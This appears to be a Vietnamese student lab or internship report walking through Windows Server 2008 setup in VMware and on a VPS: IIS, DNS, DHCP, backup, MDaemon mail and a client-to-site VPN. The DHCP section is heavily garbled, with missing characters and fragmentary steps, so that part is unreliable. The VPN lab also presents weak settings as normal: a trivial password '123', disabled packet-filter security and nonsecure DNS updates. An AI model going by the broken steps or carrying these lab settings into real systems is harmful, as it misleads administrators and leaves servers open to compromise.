thành các máy ảo riêng biệt chạy trên một máy vật lý duy nhất. Cũng có thể chạy song
song nhiều hệ điều hành như Windows, Linux và các hệ điều hành khác một cách hiệu
quả trên một máy chủ duy nhất.
Với Hyper – V và các chính sách cấp phép đơn giản, giờ đây có thể tận dụng lợi thế của
các khoản tiết kiệm chi phí và ảo hóa một cách dễ dàng hơn bao giờ hết.
Hình 1.1 Mô hình ảo hóa
Nhờ các công nghệ truy cập ứng dụng tập trung của Windows Server 2008, các ứng dụng
cũng được ảo hóa một cách hiệu quả. Terminal Services Gateway và Terminal Services
RemoteApp cho phép dễ dàng truy cập từ xa tới các chương trình chuẩn hoạt động trên
nền Windows từ bất cứ vị trí nào bằng cách chạy chương trình trên một máy chủ đầu cuối
thay vì chạy trực tiếp trên một máy trạm mà không cần tới một mạng riêng ảo (VPN)
phức tạp.

18. 2.2.2 Được xây dựng phục vụ Web
Windows Server 2008 xuất hiện với Internet Information Services 7.0 (IIS 7.0), một nền
tảng máy chủ Web dễ sử dụng, tăng cường bảo mật để phát triển và lưu trữ các ứng dụng
và dịch vụ Web một cách tin cậy. Đặc tính nâng cao quan trọng đối với nền tảng Web IIS
7.0 bao gồm một kiến trúc được thành phần hóa để đem tới khả năng linh hoạt và kiểm
soát cao hơn. II.7.0 cũng cung cấp các khả năng quản lý được đơn giản hóa, khả năng
khắc phục sự cố mạnh mẽ, mang tính chẩn đoán giúp tiết kiệm thời gian và khả năng mở
rộng toàn diện. Internet Information Server IIS 7.0 cùng với .NET Framework 3.0 cung
cấp một nền tảng toàn diện để xây dựng các ứng dụng kết nối người dùng và dữ liệu, cho
phép họ hình ảnh hóa, chia sẻ và thao tác thông tin. Thêm vào đó, IIS 7.0 còn đóng vai
trò trung tâm trong việc hợp nhất các công nghệ nền tảng Web của Microsoft –
ASP.NET, các dịch vụ Web của Windows Communication Foudation, và Windows
Sharepoint Services
Hình 1.2 Giao diện Internet Information Services (IIS) Manager
2.2.3 Bảo mật cao
Windows Server 2008 là hệ điều hành Windows Server bảo mật nhất từ trước đến giờ.Hệ
điều hành này đã được củng cố chắc chắn để giúp bảo vệ chống lại hỏng hóc.Một số công
nghệ mới giúp ngăn chặn các kết nối bất hợp pháp tới các mạng, máy chủ, dữ liệu của
bạn và các tài khoản người dùng.Chức năng Network Access Protection (NAP) giúp đảm
bảo rằng những máy tính nào muốn kết nối với mạng của bạn đều phải tuân thủ chính

19. sách bảo mật của tổ chức.Việc tích hợp công nghệ và nhiều tính năng nâng cao khiến các
dịch vụ Active Directory trở thành một giải pháp IDA (Identity and Access - Nhận dạng
và Truy cập) tích hợp, hợp nhất và mạnh mẽ.Thêm vào đó, Read-Only Domain
Controller (RODC) và Mã hóa ổ đĩa bằng BitLocker cho phép bạn triển khai cơ sở dữ
liệu AD một cách bảo mật hơn trên khắp các khu vực của văn phòng chi nhánh.
Tính toán hiệu năng cao lợi ích và các khoản tiết kiệm chi phí của Windows Server 2008
mở rộng tới Windows HPC Server 2008 để phục vụ cho môi trường tính toán hiệu năng
cao (HPC) của bạn. Windows HPC Server 2008 được xây dựng trên nền Windows Server
2008, công nghệ 64 bit và có thể mở rộng một cách hiệu quả tới hàng nghìn lõi xử lý với
tính năng có sẵn để cải thiện hiệu suất, và giảm tính phức tạp của môi trường HPC.
Windows HPC Server 2008 cho phép triển khai rộng rãi hơn bằng cách đem tới cho
người dùng cuối những trải nghiệm phong phú và tích hợp, mở rộng từ ứng dụng máy
bàn tới các cụm máy, và bao gồm một bộ trọn vẹn các công cụ triển khai, quản trị và
giám sát. Các công cụ này dễ triển khai, quản lý và tích hợp với hạ tầng CNTT hiện có
của bạn.
2.3. Các công nghệ được tiếp xúc, quá trình làm việc và các kiến thức
2.3.1 Làm việc với Windows Server 2008 trên môi trường máy ảo VMWare
Hình 1 :VMware Workstation 10

20. VMWare WorkStation là một phần mềm giúp tạo máy ảo :
 Chạy các ứng dụng trên nhiều hệ điều hành bao gồm cả Linux, Windows và nhiều
hơn nữa cùng một lúc trên cùng một máy tính mà không cần khởi động lại.
 Giúp đánh giá và kiểm tra hệ điều hành mới, các ứng dụng và các bản vá lỗi trong
một môi trường bị cô lập.
 Củng cố nhiều máy tính chạy các máy chủ web, máy chủ cơ sở dữ liệu, vv vào
một máy tính duy nhất
 Xây dựng kiến trúc tham khảo để đánh giá trước khi triển khai vào sản xuất. Như
việc trong khi thực hành về máy Windows Server 2008 trên máy ảo để nghiên cứu
trước khi triển khai trên hệ thống thật.
2.3.1.1Cài đặt và cấu hình máy chủ Windows Server 2008
Xác định yêu cầu phần cứng
Hình 2.2 Cấu hình cài đặt Windows Server 2008
2.3.1.2Các bước cài đặt Windows Server 2008 (trên máy ảo VMware Workstation)
Mở máy ảo VMware Workstation

21. Click File >New Vitual Machine…
Xuất hiện hộp thoại New Vitual Machine Wizard
Click Next
Click Installer disc image file (iso) nếu có file ISO và
click Browse.. chọn đường dẫn đến nơi chưa file ISO.
Nếu có đĩa Win Server 2008 thì chọn Installer disc

22. Nhập key và Next> Next
Nhập dung lượng ổ đĩa vào ô Maximum disk size khuyến nghị là 40 GB
Click Next

23. Click Finish để tiến hành cài đặt
Chọn Ngôn ngữ để cài đặt

24. Bấm Install now Nhập product key
Chọn kiểu cài đặt Windows ServerChọn I accept the license terms và Next2008
Enterprise (Full Installation)

25. Chọn Custom Chọn phân vùng ổ đĩa và Next
Chờ cho quá trình cài đặt hoàn tất.

26. Hệ thống yêu cầu bạn thay đổi mật khẩu ngay lập tức.Bạn bấm OK, nhập mật
khẩu mới và bấm phím Enter. Và như vậy bạn đã cài đặt hoàn tất Windows Server
2008
Giao diện Window Server 2008

27. 2.3.1.3 Khởi tạo cấu hình lần đầu tiên cho Windows Server 2008
Ngay khi bạn đăng nhập thành công, hệ thống hiển thị màn hình yêu cầu thực hiện các
thao tác cầu hình ban đầu cho Windows (Initial Configuration Tasks). Trong đó bao gồm
Set time zone : thiết lập time zone cho server.
Configure networking : thiết lập các thông số kết nối mạng bằng cách mở cửa sổ
Network Connections và tương tác với các kết nối hiện có trên server.
Provide computer name and domain : mở hộp hội thoại System Properties để
thay đổi tên máy tính và kết nối vào domain.
Enable automatic updating and feedback : kích hoạt tính năng này để cho phép
bạn cấu hình Windows automatic updating, Windows Error Reporting và
Customer Experience Improvement Program.
Hình 1: Màn hình Initial Configuration Task

28. Hình 2: Kích hoạt tính năng automatic updating and feedback
Cài đặt Server Manager
Ngay khi bạn kết thúc các bước cấu hình và đóng màn hình Initial Configuration Tasks,
màn hìnhServer Manager tự động được kích hoạt. Tại đây, bạn có thể thực hiện hầu hết
các thao tác cấu hình trên server
Hình 3: Màn hình chính của Server Manager

29. Server Manager là một công cụ che phép bạn thực hiện hầu hết các thao tác quản trị trên
Windows Server 2008, từ các dịch vụ server như Active Directory, DNS, DHCP, … đến
các thành phần của hệ thống như .NET Framework 3.0, Network Load Balancing, Group
Policy Management, … ; từ hệ thống firewall, quản lý user và group đến các dịch vụ sao
lưu hệ thống, quản lý đĩa… Có thể nói rằng công cụ này là kết quả của sự kết hợp hòan
hảo các công cụ quản lý trên những phiên bản Windows trước đó. Theo mặc định, Server
Manager sẽ tự động khởi động ngay sau khi bạn đăng nhập vào hệ thống. Nếu đã đóng
cửa sổ này, bạn có thể thực hiện một trong những cách sau để mở lại (Kích chuột phải
vào biểu tượng Computer trên desktop, chọn Manage).
2.3.1.3.1.Các thành phần trong Server Manager
Khi làm việc với Server Manager, bạn sẽ tương tác với 5 thành phần chính :
Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây bạn
cũng có thể quản lý chi tiết dữ liệu tương ứng với mỗi dịch vụ.
Features cho phép bổ sung và loại bỏ các thành phần trên Windows Server
2008. Chức năng này tương tự như Add/Remove Windows Components
trong các phiên bản Windows trước đó.
Diagnostics tích hợp các thành phần Event Viewer, Reliability and
Performance và Device Manager.
Configuration bao gồm các công cụ Local Users And Group, Task
Scheduler, Windows Firewall with Advanced Security, WMI Control và
Services. WMI Control được dùng để quản lý các dịch vụ Windows
Management Instrumentation.
Storage tích hợp hai công cụ Windows Server Backup và Disk
Management.
a) Quản lý các dịch vụ Server (Roles)
Để mở các cửa sổ quản lý các dịch vụ server, bạn chọn mục Roles ở khung bên trái của
màn hình Server Manager. Trên Windows Server 2008 nói chung, bạn có thể triển khai
tất cả 16 dịch vụ server, từ Active Directory Domain Services đến các server như DHCP,
DNS, Web, … Lưu ý : ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows
Server 2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V. Hyper-V là
công nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.Để cài đặt một dịch vụ
server bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên hộp thoại Select Server Roles.
Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình cài đặt, tùy theo đặc điểm riêng của
từng dịch vụ server, bạn sẽ điền thông tin và thực hiện các thao tác cần thiết để hoàn
thành tiến trình.

30. Hình 2.3.1.2.4 Các dịch vụ Server trên Windows Server 2008
b) Quản lý các thành phần (Features)
Để mở cửa sổ quản lý các thành phần, bạn chọn mục Features ở khung bên trái của màn
hình Server Manager.Trên Windows Server 2008 bạn có thể tương tác với tất cả 35 thành
phần.Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên hộp
thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình cài đặt, tùy
theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông tin và thực hiện các thao tác
cần thiết để hoàn thành tiến trình
Hình 2.7 :Các thành phần Feature trên Windows Server 2008.

31. Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị trong khung
Features Summary thuộc cửa sổ Server Manager. Tại đây, bạn cũng có thể thực hiện các
thao tác bổ sung và loại bỏ các thành phần này.
c) Quản lý không gian lưu trữ và sao lưu dữ liệu (Storage) và Backup Server.
Mặc định, Windows Server Backup chưa sẵn dùng trên Windows Server 2008. Do đó,
bạn cần bổ sung thành phần này vào hệ thống trước khi sử dụng. Các bước thực hiện như
sau :
Trong cửa sổ Server Manager, ở khung Feature Summary, bạn chọn Add Features.
Trong màn hình Select Features, đánh dấu chọn mục Windows Server Backup Features
và bấm nút Next

32. Tiếp tục, bấm nút Install để bắt đầu cài đặt
Vào Start menu, chọn Adminstrative tools, chọn tiếp Backup Server

33. Trong lần Backup Server đầu tiên,khuyến cáo cho Admin là dùng Full server.
Click Next
Sau khi chọn khu vực chỉ định lưu trữ dữ liệu ta click Next.

34. Chương trình sẻ hỏi ta có đồng ý việc lựa chọn nơi cần Backup hay không, kiểm
tra lại một lần, nếu đã chắc chắn ta chọn „Yes‟
Lựa chọn chế độ Backup đặc biệt ở dạng VSS copy backup (được khuyến nghị sử
dụng) sau đó Click Next

35. Cuối cùng kiểm tra lại toàn bộ thông tin cấu hình một lần nữa, sau khi đã chắc
chắn việc lựa chọn ta nhấn nút „Backup‟ và chờ hệ thống xử lý.
Đang trong giai đoạn backup, việc thời gian backup sẻ nhanh hay chậm sẻ phụ
thuộc vào tốc độ xữ lý của Server và mức độ phong phú của dữ liệu

36. Hệ thống thông báo quá trình backup diển ra thành công , Admin có thể xem lại các lần
Backup trong “Event Log” của hệ thống
2.3.1.3.2DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân giải domain
thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là 173.214.177.90
Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao gồm các bản
ghi DNS và dịch vụ lắng nghe các yêu cầu.Khi máy client gửi yêu cầu phân giải
đến, DNS Server tiến hành tra cứu trong cơ sở dữ liệu và gửi kết quả tương ứng về
máy client.
Vào Server Manager  Roles Add Roles.Tại bảng Select Server Roles, chọn DNS
Server

37. Sau đó nhấn Next để tiếp tục
- Chọn Instal. Tại bảng Confirm Installation Selections xác nhận việc cài đặt.
- Chọn Close để hoàn tất cài đặt.

38. a, Cấu hình DNS
Đối với DNS Server,thông thường nên xây dựng đồng thời hai hệ thống làDNS
Server chính (Primary) và DNS Server dự phòng (Secondary) dùng chung một cơ
sở dữ liệu. Với phương pháp này,sẽ hạn chế khả năng dịch vụ DNS bị ngưng khi
có sự cố xảy ra trên hệ thống.
Vào Start Administrative Tools DNS.
Nhấp chuột phải vào Forward Lookup Zones và chọn New Zone.
- Tại bảng Welcome to the New Zone Wizard ,chọn Next.
Tại bảng Zone Type chọn Primary zone để cấu hình DNS Server chính.

39. Chọn Next. Tại bảng Zone Name gõ tên domain vào.
Chọn Next. Tại bảng Zone File, để mặc định. Chọn Next.
Chọn Next. Tại bảng Completing the New Zone Wizard xem lại thông tin.

40. Sau đó chọn Finish để hoàn tất.
Nhấp chuột phải vào Reverse Lookup Zones và chọn New Zone.
Tại bảng Welcome to the New Zone Wizard chọn Next.
Tại bảng Zone Type chọn Primary zone để cấu hình chức năng reverse cho DNS
Server chính.
Chọn Next.
Tại bảng Reverse Lookup Zone Name chọn kiểu IP cần phân giải. Ở đâychọn IPv4.

41. Chọn Next. Điền Network ID và chọn Next.
Tại bảng Zone File để mặc định. Chọn Next.
Tại bảng Dynamic Update chọn Allow both nonsecure dynamic updates.

42. Chọn Next và xem lại thông tin thiết lập, và sau đó chọn Finish để kết thúc.
b, Cấu hình đị a chỉ DNS Server trên máy Client

43. c, Bổ sung các bản ghi DNS vào DNS Server
 Nếu muốn tạo các record khác.Nhấp chuột phải vào zone và chọn Other
NewRecords.
Vào Start Administrative Tools DNS. Nhấp chuột phải vào zone và chọn New
Gõ tên host vào mục Name, gõ địa chỉ IP vào mục IP address. Nếu muốn tạo ra một
bản ghi DNS phân giải ngược tương ứng thì đánh dấu chọn Create associated pointer
(PTR) record.
Sau đó chọn Add Host.Xuất hiện thông báo thành công.

44. Chọn OK. Bảng New Host tiếp tục xuất hiện, chọn Done để kết thúc tạo bản ghi.Để
tạo một bản ghi Alias, nhấp chuột phải vào zone và chọn New Alias (CNAME).
Tương tự như trên, điền các thông tin vào. Tại mục Fully qualified domain name
(FQDN) for target host, nếu bạn không nhớ, chọn Browse để tìm tên máy cần thết.
Sau khi đã điền thông tin đầy đủ. Chọn OK để hoàn tất.

45. 2.3.1.3.3 DHCP
 Giới thiệu dich vụ DHCP
Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho cácmáy
trạm.(client). Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so
với cơ chế khai báo tĩnh các thông số mạng như:
Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ thống
mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số lượng địa chỉ IP thật
(Public IP).Phù hợp cho các máy tính thường xuyên di chuyển qua lại giữa các mạng.Kết
hợp với hệ thống mạng không dây (Wireless) cung cấp các điểm Hotspot như: nhà ga,
sân bay, trường học…
 Hoạt động của giao thức
Giao thức DHCP làm việc theo mô hình client/server.Khi máy client khởi động, máy sẽ
gửi broadcast gói tin DHCPDISCOVER, yêu cầu một server phục vụ mình. Gói tin này
cũng chứa địa chỉ MAC của máy client.Các máy Server trên mạng khi nhận được gói tin
yêu cầu đó, nếu còn khả năng cung cấp địa chỉ IP, đều gửi lại cho máy Client gói tin
DHCPOFFER, đề nghị cho thuê một địa chỉ IP trong một khoản thời gian nhất định, kèm
theo là một subnet mask và địa chỉ của Server.
Cài đặt trên Windows Server 2008
1.Trên máy Server
 Roles Add Roles. Next Roles DHCP
Server Next.

46. Things to Note
Next.
nh Next.

47. Parent Domain Preferred
DNS…” v Validate v Next.
T Next.

48. Add or Edit DHCP Scopes Add scope,
add và nhấnOK.

49. Nhấn Next và ụ Disable
IPv6 Stateless mode…” và Next.
Next.

50. .
Nhấn Install để tiến hành cài đặt.
, và nhấn Close.
.

51. 2 Trên máy Client
ấ /IPv4 .
Mở Command Prompt, nhậ ập tiế
DHCP.
3,Cấu hình DHCP
3.1, Tạo Scope
Administrative ToolsDHCP.

52. Nhấ IPv4 và New Scope.
New Scope và Next.
Scope Name và ục Namevà nhấn Next.

53. IP Address Range  Next.
Add Exclusions
AddNext.
Lease Duration .

54. Configuration DHCP Options
. Ở Yes, I want to config these options
nowvà nhấn Next.
Router (Default gateway):
và Next.

55. DNS server
Nhấn Next để tiếp tục.
ại Active Scope active scopevà nhấnNext.
Sau đó nhấnFinish để .
:

56. 3.2. Thay đổi options của Scope
v scope optionsConfigure Options.
.
cho scope Router. Router
.

57. 3.3. Thay đổi Server options
Server optionsConfigure Options.
.
2.3.1.3.4Web Server IIS
1. Giới thiệu về IIS 7.0
IIS7 được thiết kế để trở thành một nền tảng Web và ứng dụng linh động và an toàn nhất
cho Microsoft. Microsoft đã thiết kế lại IIS từ những nền tảng đã có trước đó. IIS có các
tính năng
Bảo mật
Khả năng mở rộng
Cấu hình và triển khai
Quản trị và chuẩn đoán
Hiệu suất
2. Cài đặt IIS 7.0
Để cài đặt IIS7.0 nhập phải chuột Computer chọn Manage.Chọn Roles trong Server
Managersau đó click chọn Add roles.
Chọn Web Server (IIS) trong màn hình Select Server Roles.

58. Windows sẽ bật màn hình Add Roles Wizard nhấp chọn Add Required Features.Chọn các
dịch vụ cần thiết cho Server. Nhấn Next
Nhấn Install để bắt đầu cài đặt.

59. Quá trình cài đặt bắt đầu.

60. Sau khi cài đặt hoàn tất sẽ thấy trong Administrative Tools xuất hiện đến 2 dịch vụ
IIS đó là IIS6 và IIS7.
3. Xuất bản một website
Để xuất bản một website, bạn thực hiện các bước như sau :
Mở cửa sổ Internet Information Service (IIS) Manager.
Kích chuột phải lên mục Sites ở khung bên trái, chọn Add Web Site.
Xuất bản một website mới

61. Trong hộp thoại Add Web Site, bạn điền thông tin :
Tên của website vào mục Site name, chẳng hạn thuvien-it.net.
Nhập đường dẫn đến thư mục chứa mã nguồn của website vào mục Physical
path hoặc bấm vào nút ba chấm (…) để định đường dẫn.
Nếu xuất bản website với mã nguồn chứa ở một máy tính khác, bạn cần bấm vào
nút Connect as và chỉ định tài khoản dùng để truy cập thư mục ở xa này.
Nếu xuất bản nhiều website, bạn cần nhập tên truy cập chính xác của các website
vào mục Host name.
Sau khi điền đầy đủ thông tin, bạn bấm nút OK để đóng hộp thoại Add Web Site.
Ngay sau đó, một thông báo xuất hiện, cho biết cổng 80 đã được một website khác sử
dụng (thông thường là Default Web Site).
Thông báo xung đột cổng
Trong trường hợp này, bạn cần kích chọn Default Web Site và bấm nút Stop ở khung bên
phải để ngưng trạng thái hoạt động của website này.Đồng thời, bạn chọn website của
mình và bấm nút Start ở khung bên phải để kích hoạt trạng thái hoạt động cho website.

62. Đến nay, bạn đã hoàn thành thao tác xuất bản một website.Nếu muốn kiểm tra, bạn mở
trình duyệt và gõ địa chỉ http://localhost. Ngay sau đó, nội dung website của bạn sẽ xuất
hiện
2.3.1.3.5 Mail Server
Hiện nay có rất nhiều phần mềm quản lý Mail trên Server như: Mail Exchange,… nhưng
MDaemon Mail Server là 1 trong những giải pháp hệ thống mail server toàn diện nhất
hiện nay dành cho các công ty, doanh nghiệp với quy mô khác nhau.
MDaemon Mail Server hiện có 3 phiên bản: Standard, Pro và Free. Sau đây là một số
điểm đáng chú ý của chương trình
Giao diện Mdeamon

63. Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đưa ra thông tin
quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống kê, luồng dữ liệu đang
trong trạng thái hoạt động (active) và các mail đang trong quá trình chờ đợi (queued) để
được xử lý. Bên cạnh đó, còn có sự lựa chọn cho người dung chuyển đổi trạng thái
activating/deactivating đối với các hệ thống máy chủ khác nhau có sử dụng
MDaemon.Cửa sổ bên phải hiển thị đầy đủthông tin về kết nối dữ liệu đầu vào và ra
(incoming và outgoing) đang được thực hiện.
1. Quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.
Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá trình cài
đặt.Bấm "Next" để tiếp tục.
Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"

64. Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ
điều hành Microsoft Windows).
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử
dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.
Tùy chọn các thông tim phù hợp với vị trí, ở đây là VietNam

65. Điền tiếp các thông tin đầy đủ như tên, số điện thoại, công ty, địa chỉ email, mã vùng :
Điền đúng thông tin về quy mô của tổ chức hoặc công ty :
Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt :

66. Quá trình cài đặt diễn ra khoảng 5 phút. Sau khi kết thúc, người sử dụng bắt đầu thiết lập,
tùy chỉnh các thông số phù hợp :
Điền tên Domain chính xác :
Sau đó thiết lập 1 tài khoản với mật khẩu từ 6 – 12 ký tự :
Điền địa chỉ DNS chính (Primary) và dự phòng (Backup) :

67. Để MDaemon hoạt động ở chế độ tùy ý (Easy hoặc Advance tùy theo mục đích sử dụng):
Giữ nguyên lựa chọn "Setup MDaemon as a system service" :
Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng

68. 2. Cấu hình mail đã cài đặt Mdaemon
Trong một số trường hợp, server mạng LAN đã cài đặt Mdaemon. Cấu hình cho
Mdaemon nhận được Server theo các bước sau:
Khởi động chương trình Mdaemon, chọn Setup – Primary domain
Nhập thông số domain được cung cấp:

69. Các thông số về domain được cung cấp trong email thông tin quản trị dịch vụ. Nhập
domain name vào 2 mục: Domain name, FQDN for this host.
Domain IP: Nhập IP của Server.
(!) Trong trường hợp không biết Server IP là bao nhiêu có thể làm như sau:
Chọn Start – Run – nhập cmd.
Ở màn hình DOS Prompt nhập: ipconfig.
IP server sẽ xuất hiện.
(!) Thông thường, IP Server mạng LAN là: 192.168.0.1
Nếu vẫn không xác định được IP, nhập: 127.0.0.1 hoặc để theo mặc định này.
Cấu hình quy tắc hướng mail gởi ra ngoài:

70. Chọn mục Always send every outbound server... để hướng mail gởi đi qua tài khoản
Email online
Mail Server: điền mail server của quý khách (thông thường có dạng mail.tên_miền)
Check vào mục “...requires authentication” và điền thông tin tài khoản mail trung chuyển
Nhập thông số DNS Server:
Thông số này được cung cấp trong email thông tin quản trị dịch vụ.
- Nhập IP của DNS Server (cũng là IP Server Mail) vào Primany/Backup DNS Server IP.
- Click Apply để tiếp tục.
- Click OK để đóng cửa sổ.

71. 3. Cấu hình kết nối Server:
Chọn Setup – DomainPOP mail collection để thiết lập thông số kết nối Server.
Hostname or IP: điền IP server mail hoặc mail.prowhois.net
Login name – password: tài khoản email trung chuyển đã tạo.

72. 4. Quản lý Email Offline
Quản lý địa chỉ email offline bao gồm các công việc sau:
Tạo địa chỉ email offline.
Thay đổi thông số địa chỉ email offline.
Xóa địa chỉ email offline.
Tạo địa chỉ email offline
Mở Mdaemon, chọn Accounts, Account manager:
Giao diện sau sẽ xuất hiện:
Để tạo địa chỉ email trên Mdaemon, click New .

73. Nhập các thông số cần thiết.Click OK .
Sửa thông số và xóa tài khoản email offline

74. 2.3.1.3.6VPN
Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần phải làm
việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những người dùng truy cập
từ xa có thể được định danh và xác thực; các được hầm có thể được tạo lập, duy trì
và quản lý cho hàng trăm người dùng; việc định tuyến có thể kiểm soát tất cả
luồng lưu lượng qua Gateway, và trong khi tất các những thứ này đang tiếp tục,
hiệu suất và sự an toàn cần được duy trì.
Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng ảo hoạt động
đúng đắn. Để đưa ra quyết định đúng lúc triển khai các kết nối mạng riêng ảo truy
cập từ xa, ta phải hiểu tất cả các thành phần liên quan. Trong chương "Tổng quan
về mạng riêng ảo" chúng ta đã thảo luận về kiểu kịch bản mạng riêng ảo truy cập
từ xa, trong đó nhiều Client truy cập tới một cổng kết nối đơn vào các tài nguyên
trong mạng Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng
1. Mô hình VPN Client to Site

75. a, Trên máy Server
Cài đặt Routing and Remote Access
Mở Server Manager > Nhấn phải Roles > Add Roles
Chọn vào Network policy and access services

76. Chọn Next
Chọn Routing and Remote Access Services > Next
Nhấn Install > Nhấn Close

77. Tạo user để Client kết nối vào VPN Server
User: u1
Password: 123
Bỏ dấu chọn tại ô User must change password at next logon.
Cho phép U1 có quyền Allow access >>OK
Trong cửa sổ Routing and Remote Access, Click chuột phải SERVER1 --- chọn
Configure and Enable Routing and Remote Access.

78. Cửa sổ Welcome to the Routing and Remote Access Server Setup Wizard, nhấn Next.Tại
cửa sổ Configuration, check vào ô Remote Access (dial-up or VPN) và Next
Cửa sổ Remote Access, check vào ô VPN Next

79. Cửa sổ VPN Connection ,chọn card INTERNET và bỏ dấu chọn tại ô ” Enable security
on the selected… packet filters” , nhấn Next .
Cửa sổ IP Address Assignment, check vào ô “From a specified range of addresses” nhấn
Next

80. Tại cửa sổ Address Range Assignment, chọn New
Tại cửa sổ New Address Range, nhập vào Start IP và End IP, nhấn OK -- Next
Tại cửa sổ Managing Multiple Remote Access Servers, check vào ô “No, use Routing
and … requests”--> Next -- > Finish --->OK

81. b, Trên máy Client:
Click chuột phải trên My Network Places chọn Properties - Create a new connection --
cửa sổ Welcome --> Next.
Tại cửa sổ Network Connection Type --> check vào ô “Connect to the network at my
workplace” --->Next
Cửa sổ Network Connection, check vào ô “Virtual Private Network Connection” -- Next

82. Tại cửa sổ Connection Name -->tại ô Company Name gõ vào tên bất kỳ (VD:ITLab) –
Next.
Tại cửa sổ VPN Server Selection, gõ Hostname đã đăng ký trên NO-IP vào ô “Host name
or IP address……” --> Next --->Finish
**Lưu ý: Tại SERVER1 bạn phải cài chương trình cập nhật IP cho host name banbeit.no-
ip.com !

83. Tại cửa sổ Connect, nhập User name là u1, Password là 123 và Connect
2.3.2 Làm việc với Winsdows Server 2008 trên máy chủ ảo VPS (Virtual private
server)
 VPS theo lưu lượng là loại hình máy chủ VPS tiện dụng, phù hợp & đem lại nhiều
lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ riêng với chi phí
CỰC THẤP.
 VPS là dịch vụ máy chủ chạy dưới dạng chia sẻ từ 1 tài nguyên server chính hoạt
động như một Dedicated Server. Người quản trị (khách hàng) có quyền cao nhất
để toàn quyền quản trị Server.
 VPS kết nối Internet với 01 IP tĩnh và được cài đặt sẵn hệ điều hành tùy chọn.
VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị giới hạn số
lượng domain.
 VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server,
Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi nhánh
với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật
 VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy chủ giảm
tối đa chi phí.
 VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian thực hiện
rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.

84.  VPS như một giải pháp dung hòa giữa Web Hosting và Dedicated Server theo cả
nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp cho các cá
nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng biệt, toàn
quyền quản lý với Chi Phí Thấp.
Giao diện Remote Desktop Connection
Thông qua chương trình Remote Desktop Connection ta truy cập vào VPS đã được thuê
để tiến hành cấu hình, triển khai các dịch vụ như trên máy thật.
Giao diện ban đầu khi đăng nhập vào máy chủ VPS Chúng ta tiến hành nhập User name
và Password đã được cung cấp từ bên cho thuê để truy cập vào

85. 2.3.2.1VPN thông qua máy chủ ảo VPS.
 Việc triển khai một mạng riêng ảo có nhiều dịch vụ và chức năng cần phải làm
việc cùng nhau một cách trôi chảy và dễ dàng, vì vậy những người dùng truy cập
từ xa có thể được định danh và xác thực; các được hầm có thể được tạo lập, duy trì
và quản lý cho hàng trăm người dùng; việc định tuyến có thể kiểm soát tất cả
luồng lưu lượng qua Gateway, và trong khi tất các những thứ này đang tiếp tục,
hiệu suất và sự an toàn cần được duy trì.
 Các thành phầm phải được cài đặt để tạo ra một hệ thống mạng riêng ảo hoạt động
đúng đắn. Để đưa ra quyết định đúng lúc triển khai các kết nối mạng riêng ảo truy
cập từ xa, ta phải hiểu tất cả các thành phần liên quan. Trong chương "Tổng quan
về mạng riêng ảo" chúng ta đã thảo luận về kiểu kịch bản mạng riêng ảo truy cập
từ xa, trong đó nhiều Client truy cập tới một cổng kết nối đơn vào các tài nguyên
trong mạng Intranet. Trong phần này ta sẽ mô tả các thành phần của các kết nối
mạng riêng ảo truy cập từ xa và các quan điểm thiết kế gắn với chúng
Mô hình VPN Client to Site:
Để cấu hình và thiết lập kết nối VPN Client to Site trải qua các bước sau:
Đăng nhập vào máy chủ ảo VPS với quyền quản trị.

86. Vào Start >Programs >Administrative Tools >Routing and remote access để cấu hình.
Giao diện Routing and remote Access
Click chuột phải vào server và chọn Configure and Enable Routing and Remote Access.
Cửa sổ Routing and remote access server setup wizard hiện lên ta Click Next

87. Ta chọn Custom Configutation > Next
Đánh dấu vào 2 mục VPN access và mục Lan routing. Click Next
Click Finish.

88. Click Yes để bắt đầu. Routing and Remote Acces đã sẵn sàng
Để cấu hình dải địa chỉ IP khi các máy Client truy cập vào VPN sẽ được cấp ta right click
vào Server và chọn Properties. Chuyễn sang tab IP và chọn Static andress pool
